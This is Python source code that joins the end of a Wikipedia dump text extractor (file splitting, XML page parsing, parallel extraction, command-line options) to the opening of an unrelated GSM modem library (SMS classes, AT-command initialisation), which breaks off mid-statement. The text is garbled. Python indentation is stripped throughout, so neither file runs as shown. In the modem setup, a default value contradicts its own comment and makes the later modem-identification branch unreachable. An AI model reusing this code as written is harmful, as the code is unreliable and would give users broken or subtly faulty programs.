# The namespace used for template definitions
# It is the name associated with namespace key=10 in the siteinfo header.
templateNamespace = ''
templatePrefix = ''
##
# The namespace used for module definitions
# It is the name associated with namespace key=828 in the siteinfo header.
moduleNamespace = ''
# ----------------------------------------------------------------------
# Modules
# Only minimal support
# FIXME: import Lua modules.
modules = {
'convert': {
'convert': lambda x, u, *rest: x + ' ' + u, # no conversion
}
}
# ----------------------------------------------------------------------
# Expand using WikiMedia API
# import json
# def expandTemplates(text):
# """Expand templates invoking MediaWiki API"""
# text = urlib.urlencodew(text)
# base = urlbase[:urlbase.rfind('/')]
# url = base + "/w/api.php?action=expandtemplates&format=json&text=" + text
# exp = json.loads(urllib.urlopen(url))
# return exp['expandtemplates']['*']
# ------------------------------------------------------------------------------
# Output
class NextFile():
"""
Synchronous generation of next available file name.
"""
filesPerDir = 100
def __init__(self, path_name):
self.path_name = path_name
self.dir_index = -1
self.file_index = -1
def next(self):
self.file_index = (self.file_index + 1) % NextFile.filesPerDir
if self.file_index == 0:
self.dir_index += 1
dirname = self._dirname()
if not os.path.isdir(dirname):
os.makedirs(dirname)
return self._filepath()
def _dirname(self):
char1 = self.dir_index % 26
char2 = int(self.dir_index / 26) % 26
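        # Directories are named AA, AB, ..., AZ, BA, ... (a two-letter base-26
        # encoding of dir_index).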
return os.path.join(self.path_name, '%c%c' % (ord('A') + char2, ord('A') + char1))
def _filepath(self):
return '%s/wiki_%02d' % (self._dirname(), self.file_index)
class OutputSplitter():
"""
    File-like object that splits output across multiple files of a given maximum size.
"""
def __init__(self, nextFile, max_file_size=0, compress=True):
"""
:param nextFile: a NextFile object from which to obtain filenames
to use.
:param max_file_size: the maximum size of each file.
        :param compress: whether to write data with bzip compression.
"""
self.nextFile = nextFile
self.compress = compress
self.max_file_size = max_file_size
self.file = self.open(self.nextFile.next())
def reserve(self, size):
if self.file.tell() + size > self.max_file_size:
self.close()
self.file = self.open(self.nextFile.next())
    def write(self, data):
        self.reserve(len(data))
        if self.compress:
            # BZ2File is opened in binary mode, so the text must be encoded
            self.file.write(data.encode('utf-8'))
        else:
            self.file.write(data)
def close(self):
self.file.close()
def open(self, filename):
if self.compress:
return bz2.BZ2File(filename + '.bz2', 'w')
else:
return open(filename, 'w')
# ----------------------------------------------------------------------
# READER
tagRE = re.compile(r'(.*?)<(/?\w+)[^>]*>(?:([^<]*)(<.*?>)?)?')
# 1 2 3 4
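# group 1: text preceding the tag, group 2: tag name (with a leading '/' for a
# closing tag), group 3: text following the tag on the same line, group 4: a
# trailing tag on that line (used to detect one-line open-close elements).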
def load_templates(file, output_file=None):
"""
Load templates from :param file:.
:param output_file: file where to save templates and modules.
"""
global templateNamespace, templatePrefix
templatePrefix = templateNamespace + ':'
global moduleNamespace, modulePrefix
modulePrefix = moduleNamespace + ':'
articles = 0
templates = 0
page = []
inText = False
if output_file:
output = open(output_file, 'w')
for line in file:
#line = line.decode('utf-8')
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
elif tag == 'title':
title = m.group(3)
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
if not output_file and not templateNamespace: # do not know it yet
# we reconstruct it from the first title
colon = title.find(':')
if colon > 1:
templateNamespace = title[:colon]
templatePrefix = title[:colon + 1]
# FIXME: should reconstruct also moduleNamespace
if title.startswith(templatePrefix):
define_template(title, page)
templates += 1
# save templates and modules to file
if output_file and (title.startswith(templatePrefix) or
title.startswith(modulePrefix)):
output.write('<page>\n')
output.write(' <title>%s</title>\n' % title)
output.write(' <ns>10</ns>\n')
output.write(' <text>')
for line in page:
output.write(line)
output.write(' </text>\n')
output.write('</page>\n')
page = []
articles += 1
if articles % 100000 == 0:
logging.info("Preprocessed %d pages", articles)
if output_file:
output.close()
logging.info("Saved %d templates to '%s'", templates, output_file)
return templates
def decode_open(filename, mode='rt', encoding='utf-8'):
"""
    Open a file, decoding and decompressing it depending on its extension ('.gz' or '.bz2').
:param filename: the file to open.
"""
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode, encoding=encoding)
elif ext == '.bz2':
return bz2.open(filename, mode=mode, encoding=encoding)
else:
return open(filename, mode, encoding=encoding)
def process_dump(input_file, template_file, out_file, file_size, file_compress,
process_count, html_safe):
"""
:param input_file: name of the wikipedia dump file; '-' to read from stdin
:param template_file: optional file with template definitions.
:param out_file: directory where to store extracted data, or '-' for stdout
:param file_size: max size of each extracted file, or None for no max (one file)
:param file_compress: whether to compress files with bzip.
:param process_count: number of extraction processes to spawn.
"""
global knownNamespaces
global templateNamespace, templatePrefix
global moduleNamespace, modulePrefix
urlbase = '' # This is obtained from <siteinfo>
input = decode_open(input_file)
# collect siteinfo
for line in input:
line = line #.decode('utf-8')
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'base':
# discover urlbase from the xml dump file
# /mediawiki/siteinfo/base
base = m.group(3)
urlbase = base[:base.rfind("/")]
elif tag == 'namespace':
knownNamespaces.add(m.group(3))
if re.search('key="10"', line):
templateNamespace = m.group(3)
templatePrefix = templateNamespace + ':'
elif re.search('key="828"', line):
moduleNamespace = m.group(3)
modulePrefix = moduleNamespace + ':'
elif tag == '/siteinfo':
break
if expand_templates:
# preprocess
template_load_start = default_timer()
if template_file and os.path.exists(template_file):
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", template_file)
file = decode_open(template_file)
templates = load_templates(file)
file.close()
else:
if input_file == '-':
# can't scan then reset stdin; must error w/ suggestion to specify template_file
raise ValueError("to use templates with stdin dump, must supply explicit template-file")
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", input_file)
templates = load_templates(input, template_file)
input.close()
input = decode_open(input_file)
template_load_elapsed = default_timer() - template_load_start
logging.info("Loaded %d templates in %.1fs", templates, template_load_elapsed)
if out_file == '-':
output = sys.stdout
if file_compress:
            logging.warning("writing to stdout, so no output compression (use an external tool)")
else:
nextFile = NextFile(out_file)
output = OutputSplitter(nextFile, file_size, file_compress)
# process pages
logging.info("Starting page extraction from %s.", input_file)
extract_start = default_timer()
# Parallel Map/Reduce:
# - pages to be processed are dispatched to workers
    # - a reduce process collects the results, sorts them and prints them.
# fixes MacOS error: TypeError: cannot pickle '_io.TextIOWrapper' object
Process = get_context("fork").Process
maxsize = 10 * process_count
# output queue
output_queue = Queue(maxsize=maxsize)
# Reduce job that sorts and prints output
reduce = Process(target=reduce_process, args=(output_queue, output))
reduce.start()
# initialize jobs queue
jobs_queue = Queue(maxsize=maxsize)
# start worker processes
logging.info("Using %d extract processes.", process_count)
workers = []
for _ in range(max(1, process_count)):
extractor = Process(target=extract_process,
args=(jobs_queue, output_queue, html_safe))
extractor.daemon = True # only live while parent process lives
extractor.start()
workers.append(extractor)
# Mapper process
# we collect individual lines, since str.join() is significantly faster
# than concatenation
page = []
id = ''
revid = ''
last_id = ''
ordinal = 0 # page count
inText = False
redirect = False
for line in input:
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
redirect = False
elif tag == 'id' and not id:
id = m.group(3)
elif tag == 'id' and id: # <revision> <id></id> </revision>
revid = m.group(3)
elif tag == 'title':
title = m.group(3)
elif tag == 'redirect':
redirect = True
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
colon = title.find(':')
if (colon < 0 or (title[:colon] in acceptedNamespaces) and id != last_id and
not redirect and not title.startswith(templateNamespace)):
job = (id, revid, urlbase, title, page, ordinal)
jobs_queue.put(job) # goes to any available extract_process
last_id = id
ordinal += 1
id = ''
revid = ''
page = []
input.close()
# signal termination
for _ in workers:
jobs_queue.put(None)
# wait for workers to terminate
for w in workers:
w.join()
# signal end of work to reduce process
output_queue.put(None)
# wait for it to finish
reduce.join()
if output != sys.stdout:
output.close()
extract_duration = default_timer() - extract_start
extract_rate = ordinal / extract_duration
logging.info("Finished %d-process extraction of %d articles in %.1fs (%.1f art/s)",
process_count, ordinal, extract_duration, extract_rate)
# ----------------------------------------------------------------------
# Multiprocess support
def extract_process(jobs_queue, output_queue, html_safe):
"""Pull tuples of raw page content, do CPU/regex-heavy fixup, push finished text
:param jobs_queue: where to get jobs.
:param output_queue: where to queue extracted text for output.
    :param html_safe: whether to convert entities in text to HTML.
"""
while True:
job = jobs_queue.get() # job is (id, revid, urlbase, title, page, ordinal)
if job:
out = StringIO() # memory buffer
Extractor(*job[:-1]).extract(out, html_safe) # (id, urlbase, title, page)
text = out.getvalue()
output_queue.put((job[-1], text)) # (ordinal, extracted_text)
out.close()
else:
break
def reduce_process(output_queue, output):
"""Pull finished article text, write series of files (or stdout)
:param output_queue: text to be output.
:param output: file object where to print.
"""
interval_start = default_timer()
period = 100000
# FIXME: use a heap
ordering_buffer = {} # collected pages
next_ordinal = 0 # sequence number of pages
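    # Worker processes finish pages out of order, so each extracted page is held
    # in ordering_buffer until every page with a lower ordinal has been written.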
while True:
if next_ordinal in ordering_buffer:
output.write(ordering_buffer.pop(next_ordinal))
next_ordinal += 1
# progress report
if next_ordinal % period == 0:
interval_rate = period / (default_timer() - interval_start)
logging.info("Extracted %d articles (%.1f art/s)",
next_ordinal, interval_rate)
interval_start = default_timer()
else:
# mapper puts None to signal finish
pair = output_queue.get()
if not pair:
break
ordinal, text = pair
ordering_buffer[ordinal] = text
# ----------------------------------------------------------------------
# Minimum size of output files
minFileSize = 200 * 1024
def main():
global urlbase, acceptedNamespaces
global expand_templates, templateCache
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__)
parser.add_argument("input",
help="XML wiki dump file")
groupO = parser.add_argument_group('Output')
groupO.add_argument("-o", "--output", default="text",
help="directory for extracted files (or '-' for dumping to stdout)")
groupO.add_argument("-b", "--bytes", default="1M",
help="maximum bytes per output file (default %(default)s); 0 means to put a single article per file",
metavar="n[KMG]")
groupO.add_argument("-c", "--compress", action="store_true",
help="compress output files using bzip")
groupO.add_argument("--json", action="store_true",
help="write output in json format instead of the default <doc> format")
groupP = parser.add_argument_group('Processing')
groupP.add_argument("--html", action="store_true",
help="produce HTML output, subsumes --links")
groupP.add_argument("-l", "--links", action="store_true",
help="preserve links")
groupP.add_argument("-ns", "--namespaces", default="", metavar="ns1,ns2",
help="accepted namespaces")
groupP.add_argument("--templates",
help="use or create file containing templates")
groupP.add_argument("--no-templates", action="store_false",
help="Do not expand templates")
groupP.add_argument("--html-safe", default=True,
help="use to produce HTML safe output within <doc>...</doc>")
default_process_count = cpu_count() - 1
parser.add_argument("--processes", type=int, default=default_process_count,
help="Number of processes to use (default %(default)s)")
groupS = parser.add_argument_group('Special')
groupS.add_argument("-q", "--quiet", action="store_true",
help="suppress reporting progress info")
groupS.add_argument("--debug", action="store_true",
help="print debug info")
groupS.add_argument("-a", "--article", action="store_true",
help="analyze a file containing a single article (debug option)")
groupS.add_argument("-v", "--version", action="version",
version='%(prog)s ' + __version__,
help="print program version")
args = parser.parse_args()
Extractor.keepLinks = args.links
Extractor.HtmlFormatting = args.html
if args.html:
Extractor.keepLinks = True
Extractor.to_json = args.json
expand_templates = args.no_templates
try:
power = 'kmg'.find(args.bytes[-1].lower()) + 1
# 0 bytes means put a single article per file.
file_size = 0 if args.bytes == '0' else int(args.bytes[:-1]) * 1024 ** power
if file_size and file_size < minFileSize:
raise ValueError()
except ValueError:
logging.error('Insufficient or invalid size: %s', args.bytes)
return
if args.namespaces:
acceptedNamespaces = set(args.namespaces.split(','))
FORMAT = '%(levelname)s: %(message)s'
logging.basicConfig(format=FORMAT)
logger = logging.getLogger()
if not args.quiet:
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
input_file = args.input
if not Extractor.keepLinks:
ignoreTag('a')
# sharing cache of parser templates is too slow:
# manager = Manager()
# templateCache = manager.dict()
if args.article:
if args.templates:
if os.path.exists(args.templates):
with open(args.templates) as file:
load_templates(file)
with open(input_file) as file:
page = file.read()
ids = re.findall(r'<id>(\d*?)</id>', page)
id = ids[0] if ids else ''
revid = ids[1] if len(ids) > 1 else ''
m = re.search(r'<title>(.*?)</title>', page)
if m:
title = m.group(1)
else:
logging.error('Missing title element')
return
m = re.search(r'<base>(.*?)</base>', page)
if m:
base = m.group(1)
urlbase = base[:base.rfind("/")]
else:
urlbase = ''
Extractor(id, revid, urlbase, title, [page]).extract(sys.stdout)
return
output_path = args.output
if output_path != '-' and not os.path.isdir(output_path):
try:
os.makedirs(output_path)
except:
logging.error('Could not create: %s', output_path)
return
process_dump(input_file, args.templates, output_path, file_size,
args.compress, args.processes, args.html_safe)
if __name__ == '__main__':
main()
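# -----------------------------------------------------------------------------
# Example invocation (illustrative; the dump file name and module path depend
# on your installation):
#   python -m wikiextractor.WikiExtractor enwiki-latest-pages-articles.xml.bz2 \
#       --json -o extracted -b 10M --processes 4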
|
modem.py
|
#!/usr/bin/env python
""" High-level API classes for an attached GSM modem """
import sys, re, logging, weakref, time, threading, abc, codecs
from datetime import datetime
from .serial_comms import SerialComms
from .exceptions import CommandError, InvalidStateException, CmeError, CmsError, InterruptedException, TimeoutException, PinRequiredError, IncorrectPinError, SmscNumberUnknownError
from .pdu import encodeSmsSubmitPdu, decodeSmsPdu
from .util import SimpleOffsetTzInfo, lineStartingWith, allLinesMatchingPattern, parseTextModeTimeStr
from . import compat # For Python 2.6 compatibility
from .util import lineMatching
from .exceptions import EncodingError
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION >= 3:
xrange = range
dictValuesIter = dict.values
dictItemsIter = dict.items
else: #pragma: no cover
dictValuesIter = dict.itervalues
dictItemsIter = dict.iteritems
class Sms(object):
""" Abstract SMS message base class """
__metaclass__ = abc.ABCMeta
# Some constants to ease handling SMS statuses
STATUS_RECEIVED_UNREAD = 0
STATUS_RECEIVED_READ = 1
STATUS_STORED_UNSENT = 2
STATUS_STORED_SENT = 3
STATUS_ALL = 4
# ...and a handy converter for text mode statuses
TEXT_MODE_STATUS_MAP = {'REC UNREAD': STATUS_RECEIVED_UNREAD,
'REC READ': STATUS_RECEIVED_READ,
'STO UNSENT': STATUS_STORED_UNSENT,
'STO SENT': STATUS_STORED_SENT,
'ALL': STATUS_ALL}
def __init__(self, number, text, smsc=None):
self.number = number
self.text = text
self.smsc = smsc
class ReceivedSms(Sms):
""" An SMS message that has been received (MT) """
def __init__(self, gsmModem, status, number, time, text, smsc=None):
super(ReceivedSms, self).__init__(number, text, smsc)
self._gsmModem = weakref.proxy(gsmModem)
self.status = status
self.time = time
def reply(self, message):
""" Convenience method that sends a reply SMS to the sender of this message """
return self._gsmModem.sendSms(self.number, message)
class SentSms(Sms):
""" An SMS message that has been sent (MO) """
ENROUTE = 0 # Status indicating message is still enroute to destination
DELIVERED = 1 # Status indicating message has been received by destination handset
FAILED = 2 # Status indicating message delivery has failed
def __init__(self, number, text, reference, smsc=None):
super(SentSms, self).__init__(number, text, smsc)
self.report = None # Status report for this SMS (StatusReport object)
self.reference = reference
@property
def status(self):
""" Status of this SMS. Can be ENROUTE, DELIVERED or FAILED
The actual status report object may be accessed via the 'report' attribute
if status is 'DELIVERED' or 'FAILED'
"""
if self.report == None:
return SentSms.ENROUTE
else:
return SentSms.DELIVERED if self.report.deliveryStatus == StatusReport.DELIVERED else SentSms.FAILED
class StatusReport(Sms):
""" An SMS status/delivery report
Note: the 'status' attribute of this class refers to this status report SM's status (whether
it has been read, etc). To find the status of the message that caused this status report,
use the 'deliveryStatus' attribute.
"""
DELIVERED = 0 # SMS delivery status: delivery successful
FAILED = 68 # SMS delivery status: delivery failed
def __init__(self, gsmModem, status, reference, number, timeSent, timeFinalized, deliveryStatus, smsc=None):
super(StatusReport, self).__init__(number, None, smsc)
self._gsmModem = weakref.proxy(gsmModem)
self.status = status
self.reference = reference
self.timeSent = timeSent
self.timeFinalized = timeFinalized
self.deliveryStatus = deliveryStatus
class GsmModem(SerialComms):
""" Main class for interacting with an attached GSM modem """
log = logging.getLogger('gsmmodem.modem.GsmModem')
# Used for parsing AT command errors
CM_ERROR_REGEX = re.compile(r'^\+(CM[ES]) ERROR: (\d+)$')
# Used for parsing signal strength query responses
CSQ_REGEX = re.compile(r'^\+CSQ:\s*(\d+),')
# Used for parsing caller ID announcements for incoming calls. Group 1 is the number
CLIP_REGEX = re.compile(r'^\+CLIP:\s*"(\+{0,1}\d+)",(\d+).*$')
# Used for parsing new SMS message indications
CMTI_REGEX = re.compile(r'^\+CMTI:\s*"([^"]+)",(\d+)$')
# Used for parsing SMS message reads (text mode)
CMGR_SM_DELIVER_REGEX_TEXT = None
# Used for parsing SMS status report message reads (text mode)
CMGR_SM_REPORT_REGEXT_TEXT = None
# Used for parsing SMS message reads (PDU mode)
CMGR_REGEX_PDU = None
# Used for parsing USSD event notifications
CUSD_REGEX = re.compile(r'^\+CUSD:\s*(\d),"(.*)",(\d+)$', re.DOTALL)
# Used for parsing SMS status reports
CDSI_REGEX = re.compile(r'\+CDSI:\s*"([^"]+)",(\d+)$')
def __init__(self, port, baudrate=115200, incomingCallCallbackFunc=None, smsReceivedCallbackFunc=None, smsStatusReportCallback=None,custom_handler_callback=None):
super(GsmModem, self).__init__(port, baudrate, notifyCallbackFunc=self._handleModemNotification)
self.custom_handler_callback = custom_handler_callback or self._placeholderCallback
self.incomingCallCallback = incomingCallCallbackFunc or self._placeholderCallback
self.smsReceivedCallback = smsReceivedCallbackFunc or self._placeholderCallback
self.smsStatusReportCallback = smsStatusReportCallback or self._placeholderCallback
# Flag indicating whether caller ID for incoming call notification has been set up
self._callingLineIdentification = False
# Flag indicating whether incoming call notifications have extended information
self._extendedIncomingCallIndication = False
# Current active calls (ringing and/or answered), key is the unique call ID (not the remote number)
self.activeCalls = {}
# Dict containing sent SMS messages (for auto-tracking their delivery status)
self.sentSms = weakref.WeakValueDictionary()
self._ussdSessionEvent = None # threading.Event
self._ussdResponse = None # gsmmodem.modem.Ussd
self._smsStatusReportEvent = None # threading.Event
self._dialEvent = None # threading.Event
self._dialResponse = None # gsmmodem.modem.Call
self._waitForAtdResponse = True # Flag that controls if we should wait for an immediate response to ATD, or not
        self._waitForCallInitUpdate = True # Flag that controls if we should wait for an ATD "call initiated" message
self._callStatusUpdates = [] # populated during connect() - contains regexes and handlers for detecting/handling call status updates
self._mustPollCallStatus = False # whether or not the modem must be polled for outgoing call status updates
self._pollCallStatusRegex = None # Regular expression used when polling outgoing call status
        self._writeWait = 0 # Time (in seconds) to wait after writing a command (adjusted when 515 errors are detected)
self._smsTextMode = False # Storage variable for the smsTextMode property
self._smscNumber = None # Default SMSC number
self._smsRef = 0 # Sent SMS reference counter
self._smsMemReadDelete = None # Preferred message storage memory for reads/deletes (<mem1> parameter used for +CPMS)
self._smsMemWrite = None # Preferred message storage memory for writes (<mem2> parameter used for +CPMS)
self._smsReadSupported = True # Whether or not reading SMS messages is supported via AT commands
def connect(self, reconnect=False,pin=None):
""" Opens the port and initializes the modem and SIM card
@param pin: The SIM card PIN code, if any
@type pin: str
@raise PinRequiredError: if the SIM card requires a PIN but none was provided
@raise IncorrectPinError: if the specified PIN is incorrect
"""
self.log.info('Connecting to modem on port %s at %dbps', self.port, self.baudrate)
if reconnect == False:
super(GsmModem, self).connect()
else:
if not self.alive:
super(GsmModem, self).connect()
self.write('AT+CFUN=1,1')
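            # AT+CFUN=1,1 requests full functionality with a modem reset;
            # the sleep below gives the device time to reboot before further commands.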
time.sleep(20)
# Send some initialization commands to the modem
try:
self.write('ATZ') # reset configuration
except CommandError:
# Some modems require a SIM PIN at this stage already; unlock it now
# Attempt to enable detailed error messages (to catch incorrect PIN error)
# but ignore if it fails
self.write('AT+CMEE=1', parseError=False)
self._unlockSim(pin)
pinCheckComplete = True
self.write('ATZ') # reset configuration
else:
pinCheckComplete = False
self.write('ATE0') # echo off
try:
cfun = int(lineStartingWith('+CFUN:', self.write('AT+CFUN?'))[7:]) # example response: +CFUN: 1
if cfun != 1:
self.write('AT+CFUN=1')
except CommandError:
pass # just ignore if the +CFUN command isn't supported
#test
#self.write('AT+RUI=1')
#self.write('AT+CEER?')
#self.write('AT+VGR?')
self.write('AT+CMEE=1') # enable detailed error messages (even if it has already been set - ATZ may reset this)
#if not pinCheckComplete:
#self._unlockSim(pin)
# Get list of supported commands from modem
commands = self.supportedCommands
# Device-specific settings
        callUpdateTableHint = 2 # default to Wavecom-style call state updates (0 would mean "not yet identified")
enableWind = False
if commands != None:
if '^CVOICE' in commands:
self.write('AT^CVOICE=0', parseError=False) # Enable voice calls
if '+VTS' in commands: # Check for DTMF sending support
Call.dtmfSupport = True
elif '^DTMF' in commands:
# Huawei modems use ^DTMF to send DTMF tones
callUpdateTableHint = 1 # Huawei
if '+WIND' in commands:
callUpdateTableHint = 2 # Wavecom
enableWind = True
elif '+ZPAS' in commands:
callUpdateTableHint = 3 # ZTE
else:
# Try to enable general notifications on Wavecom-like device
enableWind = True
if enableWind:
try:
wind = lineStartingWith('+WIND:', self.write('AT+WIND?')) # Check current WIND value; example response: +WIND: 63
except CommandError:
# Modem does not support +WIND notifications. See if we can detect other known call update notifications
pass
else:
# Enable notifications for call setup, hangup, etc
if int(wind[7:]) != 50:
self.write('AT+WIND=50')
callUpdateTableHint = 2 # Wavecom
# Attempt to identify modem type directly (if not already) - for outgoing call status updates
if callUpdateTableHint == 0:
if self.manufacturer.lower() == 'huawei':
callUpdateTableHint = 1 # huawei
else:
# See if this is a ZTE modem that has not yet been identified based on supported commands
try:
self.write('AT+ZPAS?')
except CommandError:
pass # Not a ZTE modem
else:
callUpdateTableHint = 3 # ZTE
# Load outgoing call status updates based on identified modem features
if callUpdateTableHint == 1:
            # Use Huawei's ^-prefixed notifications
self.log.info('Loading Huawei call state update table')
self._callStatusUpdates = ((re.compile(r'^\^ORIG:(\d),(\d)$'), self._handleCallInitiated),
(re.compile(r'^\^CONN:(\d),(\d)$'), self._handleCallAnswered),
(re.compile(r'^\^CEND:(\d),(\d),(\d)+,(\d)+$'), self._handleCallEnded))
self._mustPollCallStatus = False
# Huawei modems use ^DTMF to send DTMF tones; use that instead
Call.DTMF_COMMAND_BASE = '^DTMF={cid},'
Call.dtmfSupport = True
elif callUpdateTableHint == 2:
# Wavecom modem: +WIND notifications supported
self.log.info('Loading Wavecom call state update table')
self._callStatusUpdates = ((re.compile(r'^\+WIND: 5,(\d)$'), self._handleCallInitiated),
(re.compile(r'^OK$'), self._handleCallAnswered),
(re.compile(r'^\+WIND: 6,(\d)$'), self._handleCallEnded),
#custom
(re.compile(r'^\+WIND: 2$'), self.custom_handler_callback),
(re.compile(r'^\+WIND: 9$'), self.custom_handler_callback),
(re.compile(r'^NO CARRIER$'), self.custom_handler_callback),
(re.compile(r'^BUSY$'), self.custom_handler_callback),)
self._waitForAtdResponse = False # Wavecom modems return OK only when the call is answered
self._mustPollCallStatus = False
if commands == None: # older modem, assume it has standard DTMF support
Call.dtmfSupport = True
elif callUpdateTableHint == 3: # ZTE
# Use ZTE notifications ("CONNECT"/"HANGUP", but no "call initiated" notification)
self.log.info('Loading ZTE call state update table')
self._callStatusUpdates = ((re.compile(r'^CONNECT$'), self._handleCallAnswered),
(re.compile(r'^HANGUP:\s*(\d+)$'), self._handleCallEnded),
(re.compile(r'^OK$'), self._handleCallRejected))
            self._waitForAtdResponse = False # ZTE modems do not return an immediate OK response to ATD
self._mustPollCallStatus = False
self._waitForCallInitUpdate = False # ZTE modems do not provide "call initiated" updates
if commands == None: # ZTE uses standard +VTS for DTMF
Call.dtmfSupport = True
else:
# Unknown modem - we do not know what its call updates look like. Use polling instead
self.log.info('Unknown/generic modem type - will use polling for call state updates')
self._mustPollCallStatus = True
            self._pollCallStatusRegex = re.compile(r'^\+CLCC:\s+(\d+),(\d),(\d),(\d),([^,]),"([^,]*)",(\d+)$')
self._waitForAtdResponse = True # Most modems return OK immediately after issuing ATD
# General meta-information setup
self.write('AT+COPS=3,0', parseError=False) # Use long alphanumeric name format
# SMS setup
self.write('AT+CMGF={0}'.format(1 if self._smsTextMode else 0)) # Switch to text or PDU mode for SMS messages
self._compileSmsRegexes()
if self._smscNumber != None:
self.write('AT+CSCA="{0}"'.format(self._smscNumber)) # Set default SMSC number
currentSmscNumber = self._smscNumber
else:
currentSmscNumber = self.smsc
# Some modems delete the SMSC number when setting text-mode SMS parameters; preserve it if needed
if currentSmscNumber != None:
self._smscNumber = None # clear cache
self.write('AT+CSMP=49,167,0,0', parseError=False) # Enable delivery reports
# ...check SMSC again to ensure it did not change
if currentSmscNumber != None and self.smsc != currentSmscNumber:
self.smsc = currentSmscNumber
# Set message storage, but first check what the modem supports - example response: +CPMS: (("SM","BM","SR"),("SM"))
try:
cpmsLine = lineStartingWith('+CPMS', self.write('AT+CPMS=?'))
except CommandError:
# Modem does not support AT+CPMS; SMS reading unavailable
self._smsReadSupported = False
self.log.warning('SMS preferred message storage query not supported by modem. SMS reading unavailable.')
else:
cpmsSupport = cpmsLine.split(' ', 1)[1].split('),(')
# Do a sanity check on the memory types returned - Nokia S60 devices return empty strings, for example
for memItem in cpmsSupport:
if len(memItem) == 0:
# No support for reading stored SMS via AT commands - probably a Nokia S60
self._smsReadSupported = False
self.log.warning('Invalid SMS message storage support returned by modem. SMS reading unavailable. Response was: "%s"', cpmsLine)
break
else:
                # Supported memory types look fine, continue
preferredMemoryTypes = ('"ME"', '"SM"', '"SR"')
cpmsItems = [''] * len(cpmsSupport)
for i in xrange(len(cpmsSupport)):
for memType in preferredMemoryTypes:
if memType in cpmsSupport[i]:
if i == 0:
self._smsMemReadDelete = memType
cpmsItems[i] = memType
break
self.write('AT+CPMS={0}'.format(','.join(cpmsItems))) # Set message storage
del cpmsSupport
del cpmsLine
if self._smsReadSupported:
try:
self.write('AT+CNMI=2,1,0,2') # Set message notifications
except CommandError:
# Message notifications not supported
self._smsReadSupported = False
self.log.warning('Incoming SMS notifications not supported by modem. SMS receiving unavailable.')
# Incoming call notification setup
try:
self.write('AT+CLIP=1') # Enable calling line identification presentation
except CommandError as clipError:
self._callingLineIdentification = False
self.log.warning('Incoming call calling line identification (caller ID) not supported by modem. Error: {0}'.format(clipError))
else:
self._callingLineIdentification = True
try:
self.write('AT+CRC=1') # Enable extended format of incoming indication (optional)
except CommandError as crcError:
self._extendedIncomingCallIndication = False
self.log.warning('Extended format incoming call indication not supported by modem. Error: {0}'.format(crcError))
else:
self._extendedIncomingCallIndication = True
# Call control setup
self.write('AT+CVHU=0', parseError=False) # Enable call hang-up with ATH command (ignore if command not supported)
def _unlockSim(self, pin):
""" Unlocks the SIM card using the specified PIN (if necessary, else does nothing) """
# Unlock the SIM card if needed
if self.write('AT+CPIN?')[0] != '+CPIN: READY':
if pin != None:
self.write('AT+CPIN="{0}"'.format(pin))
else:
raise PinRequiredError('AT+CPIN')
def write(self, data, waitForResponse=True, timeout=5, parseError=True, writeTerm='\r', expectedResponseTermSeq=None):
""" Write data to the modem
        This method appends the command terminator (writeTerm, '\r' by default) to the data parameter
        and writes the result to the modem
@param data: Command/data to be written to the modem
@type data: str
@param waitForResponse: Whether this method should block and return the response from the modem or not
@type waitForResponse: bool
@param timeout: Maximum amount of time in seconds to wait for a response from the modem
@type timeout: int
@param parseError: If True, a CommandError is raised if the modem responds with an error (otherwise the response is returned as-is)
@type parseError: bool
@param writeTerm: The terminating sequence to append to the written data
@type writeTerm: str
@param expectedResponseTermSeq: The expected terminating sequence that marks the end of the modem's response (defaults to '\r\n')
@type expectedResponseTermSeq: str
@raise CommandError: if the command returns an error (only if parseError parameter is True)
@raise TimeoutException: if no response to the command was received from the modem
@return: A list containing the response lines from the modem, or None if waitForResponse is False
@rtype: list
"""
self.log.debug('write: %s', data)
responseLines = SerialComms.write(self, data + writeTerm, waitForResponse=waitForResponse, timeout=timeout, expectedResponseTermSeq=expectedResponseTermSeq)
if self._writeWait > 0: # Sleep a bit if required (some older modems suffer under load)
time.sleep(self._writeWait)
if waitForResponse:
cmdStatusLine = responseLines[-1]
if parseError:
if 'ERROR' in cmdStatusLine:
cmErrorMatch = self.CM_ERROR_REGEX.match(cmdStatusLine)
if cmErrorMatch:
errorType = cmErrorMatch.group(1)
errorCode = int(cmErrorMatch.group(2))
if errorCode == 515 or errorCode == 14:
# 515 means: "Please wait, init or command processing in progress."
# 14 means "SIM busy"
self._writeWait += 0.2 # Increase waiting period temporarily
# Retry the command after waiting a bit
self.log.debug('Device/SIM busy error detected; self._writeWait adjusted to %fs', self._writeWait)
time.sleep(self._writeWait)
result = self.write(data, waitForResponse, timeout, parseError, writeTerm, expectedResponseTermSeq)
                            self.log.debug('self._writeWait adjusted after recovering from device/SIM busy error')
if errorCode == 515:
self._writeWait = 0.1 # Set this to something sane for further commands (slow modem)
else:
self._writeWait = 0 # The modem was just waiting for the SIM card
return result
if errorType == 'CME':
raise CmeError(data, int(errorCode))
else: # CMS error
raise CmsError(data, int(errorCode))
else:
raise CommandError(data)
elif cmdStatusLine == 'COMMAND NOT SUPPORT': # Some Huawei modems respond with this for unknown commands
raise CommandError(data + '({0})'.format(cmdStatusLine))
return responseLines
@property
def signalStrength(self):
""" Checks the modem's cellular network signal strength
@raise CommandError: if an error occurs
@return: The network signal strength as an integer between 0 and 99, or -1 if it is unknown
@rtype: int
"""
csq = self.CSQ_REGEX.match(self.write('AT+CSQ')[0])
